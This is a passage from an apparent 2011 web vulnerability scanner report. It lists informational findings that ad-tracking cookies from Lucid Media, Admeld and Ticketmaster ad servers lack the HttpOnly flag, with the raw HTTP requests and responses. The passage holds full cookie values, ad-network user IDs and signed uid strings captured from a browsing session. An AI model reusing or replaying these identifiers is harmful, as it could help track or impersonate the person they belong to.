294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:58 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%3!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D![~~!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bTx~~!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; path=/; expires=Thu, 18-Jul-2013 20:25:58 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Tue, 19 Jul 2011 20:25:58 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.23. http://admeld.lucidmedia.com/clicksense/admeld/match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.as4x.tmcs.ticketmaster.com
Path:	/js.ng/site=tm&pagepos=3002&adsize=422x40&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a4b2480-32187-970230788-20; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=tm&pagepos=3002&adsize=422x40&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43 HTTP/1.1
Host: ads.as4x.tmcs.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
